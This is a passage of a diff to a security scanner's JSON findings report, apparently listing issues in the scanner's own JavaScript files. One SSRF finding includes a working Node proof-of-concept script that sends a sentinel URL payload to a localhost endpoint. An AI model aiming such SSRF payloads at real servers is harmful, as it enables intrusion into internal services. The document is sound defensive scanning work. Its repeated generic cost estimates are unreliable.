  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4756
4831
  "confidence": "low",
4757
4832
  "narrative": "Weak Randomness on `poc-generator.js:257` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4758
- }
4833
+ },
4834
+ "parser": "LOGIC",
4835
+ "family": null
4759
4836
  },
4760
4837
  {
4761
4838
  "id": "logic:policy-gate.js:154:TOCTOU:_existsSync_followed_by_file_op",
@@ -4836,7 +4913,9 @@
4836
4913
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4837
4914
  "confidence": "low",
4838
4915
  "narrative": "TOCTOU: existsSync followed by file op on `policy-gate.js:154` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4839
- }
4916
+ },
4917
+ "parser": "LOGIC",
4918
+ "family": null
4840
4919
  },
4841
4920
  {
4842
4921
  "id": "logic:profile.js:45:TOCTOU:_existsSync_followed_by_file_op",
@@ -4917,7 +4996,9 @@
4917
4996
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4918
4997
  "confidence": "low",
4919
4998
  "narrative": "TOCTOU: existsSync followed by file op on `profile.js:45` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4920
- }
4999
+ },
5000
+ "parser": "LOGIC",
5001
+ "family": null
4921
5002
  },
4922
5003
  {
4923
5004
  "id": "logic:router.js:21:TOCTOU:_existsSync_followed_by_file_op",
@@ -4998,7 +5079,9 @@
4998
5079
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4999
5080
  "confidence": "low",
5000
5081
  "narrative": "TOCTOU: existsSync followed by file op on `router.js:21` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5001
- }
5082
+ },
5083
+ "parser": "LOGIC",
5084
+ "family": null
5002
5085
  },
5003
5086
  {
5004
5087
  "id": "logic:rule-overrides.js:23:TOCTOU:_existsSync_followed_by_file_op",
@@ -5079,7 +5162,9 @@
5079
5162
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5080
5163
  "confidence": "low",
5081
5164
  "narrative": "TOCTOU: existsSync followed by file op on `rule-overrides.js:23` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5082
- }
5165
+ },
5166
+ "parser": "LOGIC",
5167
+ "family": null
5083
5168
  },
5084
5169
  {
5085
5170
  "id": "logic:rule-overrides.js:73:TOCTOU:_existsSync_followed_by_file_op",
@@ -5160,7 +5245,9 @@
5160
5245
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5161
5246
  "confidence": "low",
5162
5247
  "narrative": "TOCTOU: existsSync followed by file op on `rule-overrides.js:73` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5163
- }
5248
+ },
5249
+ "parser": "LOGIC",
5250
+ "family": null
5164
5251
  },
5165
5252
  {
5166
5253
  "id": "294af777c35ee12d",
@@ -5241,7 +5328,9 @@
5241
5328
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5242
5329
  "confidence": "low",
5243
5330
  "narrative": "Timing Oracle — Non-Constant-Time Secret Comparison on `rule-pack-signing.js:72` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5244
- }
5331
+ },
5332
+ "parser": "LOGIC",
5333
+ "family": null
5245
5334
  },
5246
5335
  {
5247
5336
  "id": "7cafc7b67b2d3edb",
@@ -5322,7 +5411,9 @@
5322
5411
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5323
5412
  "confidence": "low",
5324
5413
  "narrative": "Timing Oracle — Non-Constant-Time Secret Comparison on `rule-pack-signing.js:132` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5325
- }
5414
+ },
5415
+ "parser": "LOGIC",
5416
+ "family": null
5326
5417
  },
5327
5418
  {
5328
5419
  "id": "logic:rule-pack-signing.js:67:TOCTOU:_existsSync_followed_by_file_op",
@@ -5403,7 +5494,9 @@
5403
5494
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5404
5495
  "confidence": "low",
5405
5496
  "narrative": "TOCTOU: existsSync followed by file op on `rule-pack-signing.js:67` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5406
- }
5497
+ },
5498
+ "parser": "LOGIC",
5499
+ "family": null
5407
5500
  },
5408
5501
  {
5409
5502
  "id": "logic:rule-synthesis.js:24:TOCTOU:_existsSync_followed_by_file_op",
@@ -5484,7 +5577,9 @@
5484
5577
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5485
5578
  "confidence": "low",
5486
5579
  "narrative": "TOCTOU: existsSync followed by file op on `rule-synthesis.js:24` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5487
- }
5580
+ },
5581
+ "parser": "LOGIC",
5582
+ "family": null
5488
5583
  },
5489
5584
  {
5490
5585
  "id": "logic:ruleset-version.js:36:TOCTOU:_existsSync_followed_by_file_op",
@@ -5565,7 +5660,9 @@
5565
5660
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5566
5661
  "confidence": "low",
5567
5662
  "narrative": "TOCTOU: existsSync followed by file op on `ruleset-version.js:36` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5568
- }
5663
+ },
5664
+ "parser": "LOGIC",
5665
+ "family": null
5569
5666
  },
5570
5667
  {
5571
5668
  "id": "logic:suppressions.js:26:TOCTOU:_existsSync_followed_by_file_op",
@@ -5646,7 +5743,9 @@
5646
5743
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5647
5744
  "confidence": "low",
5648
5745
  "narrative": "TOCTOU: existsSync followed by file op on `suppressions.js:26` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5649
- }
5746
+ },
5747
+ "parser": "LOGIC",
5748
+ "family": null
5650
5749
  },
5651
5750
  {
5652
5751
  "id": "logic:suppressions.js:57:TOCTOU:_existsSync_followed_by_file_op",
@@ -5727,7 +5826,9 @@
5727
5826
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5728
5827
  "confidence": "low",
5729
5828
  "narrative": "TOCTOU: existsSync followed by file op on `suppressions.js:57` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5730
- }
5829
+ },
5830
+ "parser": "LOGIC",
5831
+ "family": null
5731
5832
  },
5732
5833
  {
5733
5834
  "id": "logic:telemetry-ingest.js:41:TOCTOU:_existsSync_followed_by_file_op",
@@ -5808,7 +5909,9 @@
5808
5909
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5809
5910
  "confidence": "low",
5810
5911
  "narrative": "TOCTOU: existsSync followed by file op on `telemetry-ingest.js:41` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5811
- }
5912
+ },
5913
+ "parser": "LOGIC",
5914
+ "family": null
5812
5915
  },
5813
5916
  {
5814
5917
  "id": "logic:triage.js:18:TOCTOU:_existsSync_followed_by_file_op",
@@ -5889,7 +5992,9 @@
5889
5992
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5890
5993
  "confidence": "low",
5891
5994
  "narrative": "TOCTOU: existsSync followed by file op on `triage.js:18` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5892
- }
5995
+ },
5996
+ "parser": "LOGIC",
5997
+ "family": null
5893
5998
  },
5894
5999
  {
5895
6000
  "id": "logic:validator-metrics.js:35:TOCTOU:_existsSync_followed_by_file_op",
@@ -5970,7 +6075,9 @@
5970
6075
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5971
6076
  "confidence": "low",
5972
6077
  "narrative": "TOCTOU: existsSync followed by file op on `validator-metrics.js:35` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5973
- }
6078
+ },
6079
+ "parser": "LOGIC",
6080
+ "family": null
5974
6081
  },
5975
6082
  {
5976
6083
  "id": "logic:verifier-target.js:66:TOCTOU:_existsSync_followed_by_file_op",
@@ -6051,7 +6158,9 @@
6051
6158
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6052
6159
  "confidence": "low",
6053
6160
  "narrative": "TOCTOU: existsSync followed by file op on `verifier-target.js:66` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6054
- }
6161
+ },
6162
+ "parser": "LOGIC",
6163
+ "family": null
6055
6164
  },
6056
6165
  {
6057
6166
  "id": "logic:version.js:43:TOCTOU:_existsSync_followed_by_file_op",
@@ -6132,7 +6241,9 @@
6132
6241
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6133
6242
  "confidence": "low",
6134
6243
  "narrative": "TOCTOU: existsSync followed by file op on `version.js:43` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6135
- }
6244
+ },
6245
+ "parser": "LOGIC",
6246
+ "family": null
6136
6247
  },
6137
6248
  {
6138
6249
  "id": "0f41f0071a156a78",
@@ -6213,7 +6324,9 @@
6213
6324
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6214
6325
  "confidence": "low",
6215
6326
  "narrative": "Weak Randomness on `waf-ingest.js:85` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6216
- }
6327
+ },
6328
+ "parser": "LOGIC",
6329
+ "family": null
6217
6330
  },
6218
6331
  {
6219
6332
  "id": "7e68ef46e5a43e74",
@@ -6294,7 +6407,9 @@
6294
6407
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6295
6408
  "confidence": "low",
6296
6409
  "narrative": "Weak Randomness on `waf-ingest.js:95` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6297
- }
6410
+ },
6411
+ "parser": "LOGIC",
6412
+ "family": null
6298
6413
  },
6299
6414
  {
6300
6415
  "id": "logic:waf-ingest.js:138:TOCTOU:_existsSync_followed_by_file_op",
@@ -6375,7 +6490,9 @@
6375
6490
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6376
6491
  "confidence": "low",
6377
6492
  "narrative": "TOCTOU: existsSync followed by file op on `waf-ingest.js:138` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6378
- }
6493
+ },
6494
+ "parser": "LOGIC",
6495
+ "family": null
6379
6496
  },
6380
6497
  {
6381
6498
  "id": "ssrf-meta-hardcoded:attack-playbooks.js:72",
@@ -6487,15 +6604,16 @@
6487
6604
  "unvalidated": true,
6488
6605
  "cross_language": false,
6489
6606
  "family": "ssrf",
6607
+ "parser": "SSRF-METADATA",
6490
6608
  "_unsigned": false,
6491
6609
  "_passThroughSigning": false,
6492
6610
  "signatureStatus": "verified",
6493
6611
  "regression_test": {
6494
6612
  "lang": "node",
6495
- "framework": "jest",
6496
- "filename": "security_80d409f9041d48c2.test.mjs",
6497
- "runHint": "npx jest",
6498
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/api/users/2\";\n const METHOD = \"GET\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
6613
+ "framework": null,
6614
+ "filename": null,
6615
+ "runHint": null,
6616
+ "code": null
6499
6617
  },
6500
6618
  "poc": {
6501
6619
  "lang": "node",
@@ -6503,7 +6621,10 @@
6503
6621
  "cwe": "CWE-918",
6504
6622
  "family": "ssrf",
6505
6623
  "runHint": "node poc.mjs",
6506
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: GET http://localhost:3000/api/users/2\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/api/users/2\";\nconst METHOD = \"GET\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
6624
+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: GET http://localhost:3000/api/users/2\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/api/users/2\";\nconst METHOD = \"GET\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
6625
+ "paramKey": "input",
6626
+ "paramKeyConfidence": "low",
6627
+ "paramKeyInferred": false
6507
6628
  },
6508
6629
  "calibrated_confidence": null,
6509
6630
  "calibrated_confidence_ci": null,
@@ -6733,6 +6854,7 @@
6733
6854
  "unvalidated": true,
6734
6855
  "cross_language": false,
6735
6856
  "family": "mass-assignment",
6857
+ "parser": "STRUCTURAL",
6736
6858
  "_unsigned": false,
6737
6859
  "_passThroughSigning": false,
6738
6860
  "signatureStatus": "verified",
@@ -6967,6 +7089,7 @@
6967
7089
  "unvalidated": true,
6968
7090
  "cross_language": false,
6969
7091
  "family": "mass-assignment",
7092
+ "parser": "STRUCTURAL",
6970
7093
  "_unsigned": false,
6971
7094
  "_passThroughSigning": false,
6972
7095
  "signatureStatus": "verified",
@@ -7201,6 +7324,7 @@
7201
7324
  "unvalidated": true,
7202
7325
  "cross_language": false,
7203
7326
  "family": "dos-sync-io",
7327
+ "parser": "STRUCTURAL",
7204
7328
  "_unsigned": false,
7205
7329
  "_passThroughSigning": false,
7206
7330
  "signatureStatus": "verified",
@@ -7430,6 +7554,7 @@
7430
7554
  "unvalidated": true,
7431
7555
  "cross_language": false,
7432
7556
  "family": "dos-sync-io",
7557
+ "parser": "STRUCTURAL",
7433
7558
  "_unsigned": false,
7434
7559
  "_passThroughSigning": false,
7435
7560
  "signatureStatus": "verified",
@@ -7659,6 +7784,7 @@
7659
7784
  "unvalidated": true,
7660
7785
  "cross_language": false,
7661
7786
  "family": "dos-sync-io",
7787
+ "parser": "STRUCTURAL",
7662
7788
  "_unsigned": false,
7663
7789
  "_passThroughSigning": false,
7664
7790
  "signatureStatus": "verified",
@@ -7888,6 +8014,7 @@
7888
8014
  "unvalidated": true,
7889
8015
  "cross_language": false,
7890
8016
  "family": "dos-sync-io",
8017
+ "parser": "STRUCTURAL",
7891
8018
  "_unsigned": false,
7892
8019
  "_passThroughSigning": false,
7893
8020
  "signatureStatus": "verified",
@@ -8117,6 +8244,7 @@
8117
8244
  "unvalidated": true,
8118
8245
  "cross_language": false,
8119
8246
  "family": "dos-sync-io",
8247
+ "parser": "STRUCTURAL",
8120
8248
  "_unsigned": false,
8121
8249
  "_passThroughSigning": false,
8122
8250
  "signatureStatus": "verified",
@@ -8346,6 +8474,7 @@
8346
8474
  "unvalidated": true,
8347
8475
  "cross_language": false,
8348
8476
  "family": "dos-sync-io",
8477
+ "parser": "STRUCTURAL",
8349
8478
  "_unsigned": false,
8350
8479
  "_passThroughSigning": false,
8351
8480
  "signatureStatus": "verified",
@@ -8575,6 +8704,7 @@
8575
8704
  "unvalidated": true,
8576
8705
  "cross_language": false,
8577
8706
  "family": "dos-sync-io",
8707
+ "parser": "STRUCTURAL",
8578
8708
  "_unsigned": false,
8579
8709
  "_passThroughSigning": false,
8580
8710
  "signatureStatus": "verified",
@@ -8804,6 +8934,7 @@
8804
8934
  "unvalidated": true,
8805
8935
  "cross_language": false,
8806
8936
  "family": "dos-sync-io",
8937
+ "parser": "STRUCTURAL",
8807
8938
  "_unsigned": false,
8808
8939
  "_passThroughSigning": false,
8809
8940
  "signatureStatus": "verified",
@@ -9033,6 +9164,7 @@
9033
9164
  "unvalidated": true,
9034
9165
  "cross_language": false,
9035
9166
  "family": "dos-sync-io",
9167
+ "parser": "STRUCTURAL",
9036
9168
  "_unsigned": false,
9037
9169
  "_passThroughSigning": false,
9038
9170
  "signatureStatus": "verified",
@@ -9262,6 +9394,7 @@
9262
9394
  "unvalidated": true,
9263
9395
  "cross_language": false,
9264
9396
  "family": "dos-sync-io",
9397
+ "parser": "STRUCTURAL",
9265
9398
  "_unsigned": false,
9266
9399
  "_passThroughSigning": false,
9267
9400
  "signatureStatus": "verified",
@@ -9493,6 +9626,7 @@
9493
9626
  "unvalidated": true,
9494
9627
  "cross_language": false,
9495
9628
  "family": "dos-sync-io",
9629
+ "parser": "STRUCTURAL",
9496
9630
  "_unsigned": false,
9497
9631
  "_passThroughSigning": false,
9498
9632
  "signatureStatus": "verified",
@@ -9724,6 +9858,7 @@
9724
9858
  "unvalidated": true,
9725
9859
  "cross_language": false,
9726
9860
  "family": "dos-sync-io",
9861
+ "parser": "STRUCTURAL",
9727
9862
  "_unsigned": false,
9728
9863
  "_passThroughSigning": false,
9729
9864
  "signatureStatus": "verified",
@@ -9957,6 +10092,7 @@
9957
10092
  "unvalidated": true,
9958
10093
  "cross_language": false,
9959
10094
  "family": "dos-sync-io",
10095
+ "parser": "STRUCTURAL",
9960
10096
  "_unsigned": false,
9961
10097
  "_passThroughSigning": false,
9962
10098
  "signatureStatus": "verified",
@@ -10190,6 +10326,7 @@
10190
10326
  "unvalidated": true,
10191
10327
  "cross_language": false,
10192
10328
  "family": "dos-sync-io",
10329
+ "parser": "STRUCTURAL",
10193
10330
  "_unsigned": false,
10194
10331
  "_passThroughSigning": false,
10195
10332
  "signatureStatus": "verified",
@@ -10423,6 +10560,7 @@
10423
10560
  "unvalidated": true,
10424
10561
  "cross_language": false,
10425
10562
  "family": "dos-sync-io",
10563
+ "parser": "STRUCTURAL",
10426
10564
  "_unsigned": false,
10427
10565
  "_passThroughSigning": false,
10428
10566
  "signatureStatus": "verified",
@@ -10656,6 +10794,7 @@
10656
10794
  "unvalidated": true,
10657
10795
  "cross_language": false,
10658
10796
  "family": "dos-sync-io",
10797
+ "parser": "STRUCTURAL",
10659
10798
  "_unsigned": false,
10660
10799
  "_passThroughSigning": false,
10661
10800
  "signatureStatus": "verified",
@@ -10889,6 +11028,7 @@
10889
11028
  "unvalidated": true,
10890
11029
  "cross_language": false,
10891
11030
  "family": "dos-sync-io",
11031
+ "parser": "STRUCTURAL",
10892
11032
  "_unsigned": false,
10893
11033
  "_passThroughSigning": false,
10894
11034
  "signatureStatus": "verified",
@@ -11122,6 +11262,7 @@
11122
11262
  "unvalidated": true,
11123
11263
  "cross_language": false,
11124
11264
  "family": "dos-sync-io",
11265
+ "parser": "STRUCTURAL",
11125
11266
  "_unsigned": false,
11126
11267
  "_passThroughSigning": false,
11127
11268
  "signatureStatus": "verified",
@@ -11355,6 +11496,7 @@
11355
11496
  "unvalidated": true,
11356
11497
  "cross_language": false,
11357
11498
  "family": "dos-sync-io",
11499
+ "parser": "STRUCTURAL",
11358
11500
  "_unsigned": false,
11359
11501
  "_passThroughSigning": false,
11360
11502
  "signatureStatus": "verified",
@@ -11588,6 +11730,7 @@
11588
11730
  "unvalidated": true,
11589
11731
  "cross_language": false,
11590
11732
  "family": "dos-sync-io",
11733
+ "parser": "STRUCTURAL",
11591
11734
  "_unsigned": false,
11592
11735
  "_passThroughSigning": false,
11593
11736
  "signatureStatus": "verified",
@@ -11821,6 +11964,7 @@
11821
11964
  "unvalidated": true,
11822
11965
  "cross_language": false,
11823
11966
  "family": "dos-sync-io",
11967
+ "parser": "STRUCTURAL",
11824
11968
  "_unsigned": false,
11825
11969
  "_passThroughSigning": false,
11826
11970
  "signatureStatus": "verified",
@@ -12054,6 +12198,7 @@
12054
12198
  "unvalidated": true,
12055
12199
  "cross_language": false,
12056
12200
  "family": "dos-sync-io",
12201
+ "parser": "STRUCTURAL",
12057
12202
  "_unsigned": false,
12058
12203
  "_passThroughSigning": false,
12059
12204
  "signatureStatus": "verified",
@@ -12283,6 +12428,7 @@
12283
12428
  "unvalidated": true,
12284
12429
  "cross_language": false,
12285
12430
  "family": "dos-sync-io",
12431
+ "parser": "STRUCTURAL",
12286
12432
  "_unsigned": false,
12287
12433
  "_passThroughSigning": false,
12288
12434
  "signatureStatus": "verified",
@@ -12512,6 +12658,7 @@
12512
12658
  "unvalidated": true,
12513
12659
  "cross_language": false,
12514
12660
  "family": "dos-sync-io",
12661
+ "parser": "STRUCTURAL",
12515
12662
  "_unsigned": false,
12516
12663
  "_passThroughSigning": false,
12517
12664
  "signatureStatus": "verified",
@@ -12547,7 +12694,7 @@
12547
12694
  "cloneClusterId": "29d998f79544cba7",
12548
12695
  "cloneClusterSize": 7,
12549
12696
  "provenance": "mixed",
12550
- "provenanceScore": 0.3,
12697
+ "provenanceScore": 0.34,
12551
12698
  "typeNarrowed": null,
12552
12699
  "strideCategory": "denialOfService",
12553
12700
  "personaScores": {
@@ -12741,6 +12888,7 @@
12741
12888
  "unvalidated": true,
12742
12889
  "cross_language": false,
12743
12890
  "family": "dos-sync-io",
12891
+ "parser": "STRUCTURAL",
12744
12892
  "_unsigned": false,
12745
12893
  "_passThroughSigning": false,
12746
12894
  "signatureStatus": "verified",
@@ -12776,7 +12924,7 @@
12776
12924
  "cloneClusterId": "cc47a2e427e15347",
12777
12925
  "cloneClusterSize": 2,
12778
12926
  "provenance": "mixed",
12779
- "provenanceScore": 0.3,
12927
+ "provenanceScore": 0.34,
12780
12928
  "typeNarrowed": null,
12781
12929
  "strideCategory": "denialOfService",
12782
12930
  "personaScores": {
@@ -12970,6 +13118,7 @@
12970
13118
  "unvalidated": true,
12971
13119
  "cross_language": false,
12972
13120
  "family": "dos-sync-io",
13121
+ "parser": "STRUCTURAL",
12973
13122
  "_unsigned": false,
12974
13123
  "_passThroughSigning": false,
12975
13124
  "signatureStatus": "verified",
@@ -13201,6 +13350,7 @@
13201
13350
  "unvalidated": true,
13202
13351
  "cross_language": false,
13203
13352
  "family": "dos-sync-io",
13353
+ "parser": "STRUCTURAL",
13204
13354
  "_unsigned": false,
13205
13355
  "_passThroughSigning": false,
13206
13356
  "signatureStatus": "verified",
@@ -13432,6 +13582,7 @@
13432
13582
  "unvalidated": true,
13433
13583
  "cross_language": false,
13434
13584
  "family": "dos-sync-io",
13585
+ "parser": "STRUCTURAL",
13435
13586
  "_unsigned": false,
13436
13587
  "_passThroughSigning": false,
13437
13588
  "signatureStatus": "verified",
@@ -13663,6 +13814,7 @@
13663
13814
  "unvalidated": true,
13664
13815
  "cross_language": false,
13665
13816
  "family": "dos-sync-io",
13817
+ "parser": "STRUCTURAL",
13666
13818
  "_unsigned": false,
13667
13819
  "_passThroughSigning": false,
13668
13820
  "signatureStatus": "verified",
@@ -13894,6 +14046,7 @@
13894
14046
  "unvalidated": true,
13895
14047
  "cross_language": false,
13896
14048
  "family": "dos-sync-io",
14049
+ "parser": "STRUCTURAL",
13897
14050
  "_unsigned": false,
13898
14051
  "_passThroughSigning": false,
13899
14052
  "signatureStatus": "verified",
@@ -14125,6 +14278,7 @@
14125
14278
  "unvalidated": true,
14126
14279
  "cross_language": false,
14127
14280
  "family": "dos-sync-io",
14281
+ "parser": "STRUCTURAL",
14128
14282
  "_unsigned": false,
14129
14283
  "_passThroughSigning": false,
14130
14284
  "signatureStatus": "verified",
@@ -14356,6 +14510,7 @@
14356
14510
  "unvalidated": true,
14357
14511
  "cross_language": false,
14358
14512
  "family": "dos-sync-io",
14513
+ "parser": "STRUCTURAL",
14359
14514
  "_unsigned": false,
14360
14515
  "_passThroughSigning": false,
14361
14516
  "signatureStatus": "verified",
@@ -14587,6 +14742,7 @@
14587
14742
  "unvalidated": true,
14588
14743
  "cross_language": false,
14589
14744
  "family": "dos-sync-io",
14745
+ "parser": "STRUCTURAL",
14590
14746
  "_unsigned": false,
14591
14747
  "_passThroughSigning": false,
14592
14748
  "signatureStatus": "verified",
@@ -14818,6 +14974,7 @@
14818
14974
  "unvalidated": true,
14819
14975
  "cross_language": false,
14820
14976
  "family": "dos-sync-io",
14977
+ "parser": "STRUCTURAL",
14821
14978
  "_unsigned": false,
14822
14979
  "_passThroughSigning": false,
14823
14980
  "signatureStatus": "verified",
@@ -15049,6 +15206,7 @@
15049
15206
  "unvalidated": true,
15050
15207
  "cross_language": false,
15051
15208
  "family": "dos-sync-io",
15209
+ "parser": "STRUCTURAL",
15052
15210
  "_unsigned": false,
15053
15211
  "_passThroughSigning": false,
15054
15212
  "signatureStatus": "verified",
@@ -15280,6 +15438,7 @@
15280
15438
  "unvalidated": true,
15281
15439
  "cross_language": false,
15282
15440
  "family": "dos-sync-io",
15441
+ "parser": "STRUCTURAL",
15283
15442
  "_unsigned": false,
15284
15443
  "_passThroughSigning": false,
15285
15444
  "signatureStatus": "verified",
@@ -15511,6 +15670,7 @@
15511
15670
  "unvalidated": true,
15512
15671
  "cross_language": false,
